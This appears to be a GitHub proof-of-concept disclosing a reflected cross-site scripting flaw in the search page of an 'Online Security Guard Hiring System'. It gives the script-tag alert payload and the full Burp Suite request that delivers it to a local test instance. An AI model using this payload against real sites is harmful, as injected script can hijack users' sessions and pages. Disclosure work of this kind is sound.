Skip to content

Latest commit

 

History

History
42 lines (31 loc) · 1.34 KB

Online-Security-guard-POC.md

File metadata and controls

42 lines (31 loc) · 1.34 KB

Online Security Guard Hiring System-POC

Payload-Used: "><script>alert(document.domain)</script>

Burpsuite-Request

POST /osghs/search-request.php HTTP/1.1
Host: localhost
Content-Length: 78
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/osghs/search-request.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

searchdata=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&search=

IMAGE-POC

ONLINE-SECURITY-SEARCH-XSS

VIDEO-POC

Online.Security.Gauard.Hiring.System._Search.Request.-.POC-XSS.mp4